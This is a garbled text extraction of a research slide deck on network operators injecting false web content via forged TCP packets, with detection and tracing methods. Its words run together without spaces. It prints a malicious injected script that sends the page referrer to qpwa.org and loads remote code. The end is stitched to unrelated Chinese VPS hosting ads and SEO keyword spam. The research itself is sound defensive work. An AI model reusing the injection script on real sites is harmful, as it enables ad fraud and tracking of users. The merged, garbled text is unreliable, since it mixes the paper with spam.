WEBSITE-TARGETEDFALSECONTENTINJECTIONBYNETWORKOPERATORSGabiNakibly1,2,JaimeSchcolnik3andYossiRubin21Technion–IsraelInstituteoftechnology2Rafael–AdvancedDefenseSystemsltd.
3IDCHerzliyaKNOWNEVENTSOFWEBCONTENTALTERATIONSomeISPsinthepasthavebeenspottedalteringtheircustomers'traffic:CMACommunicationsin2013Comcastin2012Mediacomin2011WOW!
in2008….
RogueadvertisementHOWTHEPRACTICEOFCONTENTALTERATIONWASSTUDIEDSeveralworksstudiedandanalyzedthispracticeE.
g.
NetalyzrHowpastworkmonitoredtraffictounearthcontentalterations:HOWTRAFFICWASMONITOREDINOURSTUDYWHATISOUT-OF-BANDCONTENTALTERATIONIn-bandcontentalteration:Out-of-bandcontentalteration:OUT-OF-BANDINJECTION–MODUSOPERANDI250bytessq#=0100bytessq#=250150bytessq#=350ourmonitoringpoint150bytessq#=350OUT-OF-BANDINJECTIONDETECTIONForgedbytessq#=350Validbytessq#=350TCPinjectionhasoccurrediftherearetwopacketsthathave:IdenticalIPaddressesandportnumbers,IdenticalTCPsequencenumber,But,havedifferentpayload.
THEINJECTIONEVENTSWediscovered14differentgroupsofinjectionevents.
AlmostallofthemwereinjectionstoChinesewebsites.
7injectiongroupsaimedtoaddrogueadvertisementstothewebsite.
5ofinjectiongroupshassomesortofmaliciousintent.
2injectiongroupsaimedtosimplyblockcontent(howeverisitnotcensorshiprelated).
INJECTIONEXAMPLE#1Thisinjectiongroupaimstoinjectrogueadvertisements.
Thisistheclient'sHTTPrequest:GET/core.
phpshow=pic&t=zHTTP/1.
1User-Agent:Mozilla/5.
0(WindowsNT6.
1;WOW64)Host:c.
cnzz.
comAccept-Encoding:gzipReferer:http://tfkp.
com/INJECTIONEXAMPLE#1(CONT.
)ThevalidHTTPresponse:TheinjectedHTTPresponse:HTTP/1.
1200OKServer:TengineContent-Type:application/javascriptContent-Length:762Connection:keep-aliveDate:Tue,07Jul201504:54:08GMTLast-Modified:Tue,07Jul201504:54:08GMTExpires:Tue,07Jul201505:09:08GMT!
function(){varp,q,r,a=encodeURIComponent,c=.
.
.
HTTP/1.
1302FoundConnection:closeContent-Length:0Location:http://adcpc.
899j.
com/google/google.
jsINJECTIONEXAMPLE#2ThevalidHTTPresponse:HTTP/1.
1200OKServer:nginx/1.
4.
4Content-Type:text/javascript;charset=UTF-8Transfer-Encoding:chunkedVary:Accept-EncodingExpires:-1Cache-Control:no-store,private,post-check=0…Pragma:no-cacheP3P:CP="CURaADMaDEVaPSAoPSDoOURBUSUNIINT….
JiaTag:de2a570993d722c94……Content-Encoding:gzipTheforgedHTTPresponse:HTTP/1.
1200OKDate:May,28Mar201214:59:17GMTServer:Microsoft-IIS/6.
0X-Powered-By:ASP.
NETPragma:No-CacheContent-Length:145Cache-control:no-cacheJiaThisisaChinesecompanythatprovidesasocialsharingtoolbar.
Arequestforaresourceatjiathis.
comresultsinthefollowing:AredirectiontoBaiduwithsearchterm"UNIQLO"'GPWA'INJECTION'GPWA'INJECTIONGPWA–GamblingPortalWebmastersAssociation.
Itrunsacertificationprogramtogamblingsites.
AsitethatmeetsthecertificationstandardgetstoshowanGPWAseal.
Thereareabout2500GPWAapprovedgamblingsites.
http://certify.
gpwa.
org/seal/online.
casinocity.
com/'GPWA'INJECTIONTheclient'sHTTPrequestis:GET/script/europeansoccerstatistics.
com/HTTP/1.
1Host:certify.
gpwa.
orgConnection:keep-aliveAccept:*/*User-Agent:Mozilla/5.
0(WindowsNT6.
1;WOW64)AppleWebKit/537.
36(KHTML,likeGecko)Chrome/44.
0.
2403.
107Safari/537.
36Referer:http://europeansoccerstatistics.
com/Accept-Encoding:gzip,deflate,sdchAccept-Language:en-US,en;q=0.
8,he;q=0.
6'GPWA'INJECTION(CONT.
)Theinjectedresource.
Referstoqpwa.
orginsteadofgpwa.
org.
Thisisnotanattackbyanetworkoperator,butbyathirdpartywhoprobablycompromisedarouter.
Thevictimsoftheattackhasreportedlyhavebeenshownadsandspoofedaffiliatetags.
{vari=newImage();i.
src="http://qpwa.
org/q="+document.
referrer;l=localStorage;if((document.
referrer!
="")&&(document.
location.
hostname!
=document.
referrer.
split('/')[2])&&(!
l.
g)){c=document.
createElement('script');c.
src='http://certify.
qpwa.
org/script/'+document.
location.
hostname.
replace('www\.
','')+'/';document.
getElementsByTagName('head')[0].
appendChild(c)}l.
g=1;}WHOISBEHINDTHEINJECTIONSIngeneral,itisdifficulttounveiltheinjectingentitiesasthereisnoidentifyinginformationintheinjectedcontent.
wetriedtogetanindicationoftheiridentitybyidentifyingtheautonomoussystemfromwhichtheforgedpacketoriginated.
Sincetheinjectionswerenotreproducible,wecannotemploytheoft-usedtraceroute-likeproceduretolocatetheinjector.
WHOISBEHINDTHEINJECTIONS(CONT.
)Weusedaheuristicbasedontheforgedpacket'sIPTTLtotrackdownitssource.
ItisknownthatthedefaultinitialTTLvaluesofthemajoroperatingsystemsare32,64,128and255.
Iftheattackerusedoneofthosevalueswecancalculatehowmanyhopstheinjectedpackettraversed.
Forexample,ifaninjectedpacketarrivedattheclienthavingTTL=59,thenmostprobablyit'sinitialvaluewas64andittraversed5hops.
Giventhepathbetweentheserverandtheclientwecanpin-pointtheinjector'slocation.
ServerClientEstimatednumberofhopstraversedbytheforgedpacketPATHDETECTIONUSINGRIPEATLASHowever,wedonotknowwhatistheactualpathfromthewebservertotheuser.
Thereversepath(clienttoserver)canbetrace-routed,butInternetpathsarenotalwayssymmetric.
TosolvethisproblemweleveragedRIPEAtlas:AglobalnetworkofprobesthatmeasureInternetconnectivityandreachability.
UsingRIPEAtlaswetraceroutedthepathfromanodeintheASofthewebservertotheclient(whenthereisone).
Thisisstillanapproximationsincethatnodeinnottheactualwebserver.
THESUSPICIOUSAUTONOMOUSSYSTEMSOuranalysisindicatesthattheinjectorresideswithintheASoftheinjectedwebsite.
Usually2-5hopsawayfromthewebserver.
MostinjectionsaretriggeredfromChineseoperators.
CONCLUSIONSFollowingalarge-scalesurveyofInternettrafficwediscoveredthatnotonlyedgeISPsaltertrafficbutalsonon-edgenetworkoperatorsthataimtoincreasetheirrevenue.
Therewerenumerousincidentswithmaliciousintent.
Weproposeaclient-sidemitigationfortheattacksincaseHTTPScannotbeused.
Wepublishedsamplesoftheinjections.
搬瓦工怎么样?这几天收到搬瓦工发来的邮件,告知香港pccw机房(HKHK_1)即将关闭,这也不算是什么出乎意料的事情,反而他不关闭我倒觉得奇怪。因为目前搬瓦工香港cn2 GIA 机房和香港pccw机房价格、配置都一样,可以互相迁移,但是不管是速度还是延迟还是丢包率,搬瓦工香港PCCW机房都比不上香港cn2 gia 机房,所以不知道香港 PCCW 机房存在还有什么意义?关闭也是理所当然的事情。点击进...
数脉科技(shuhost)8月促销:香港独立服务器,自营BGP、CN2+BGP、阿里云线路,新客立减400港币/月,老用户按照优惠码减免!香港服务器带宽可选10Mbps、30Mbps、50Mbps、100Mbps带宽,支持中文本Windows、Linux等系统。官方网站:https://www.shuhost.com* 更大带宽可在选购时选择同样享受优惠。* 目前仅提供HKBGP、阿里云产品,香港...
Tudcloud是一家新开的主机商,提供VPS和独立服务器租用,数据中心在中国香港(VPS和独立服务器)和美国洛杉矶(独立服务器),商家VPS基于KVM架构,开设在香港机房,可以选择限制流量大带宽或者限制带宽不限流量套餐。目前提供8折优惠码,优惠后最低每月7.2美元起。虽然主机商网站为英文界面,但是支付方式仅支付宝和Stripe,可能是国人商家。下面列出部分VPS主机套餐配置信息。CPU:1cor...
acceptencoding为你推荐
computationgraph计划ipad支持ipad支持ipad您的iphone敬请参阅报告结尾处免责声明netbios端口26917 8000 4001 netbios-ns 端口 是干什么的win10关闭445端口在win10 如何关闭445端口的最新相关信息google中国地图谷歌卫星地图中文版下载在哪下??360chrome360的chrome浏览器进程有点多哦???
视频存储服务器 一点优惠网 牛人与腾讯客服对话 个人免费空间 创梦 国外免费全能空间 阿里校园 t云 路由跟踪 中国电信网络测速 华为k3 cdn服务 发证机构 饭桶 电脑显示屏不亮但是主机已开机 电脑主机声音大 xendesktop 最好的空间留言 七夕促销海报 彩虹云点播破解版 更多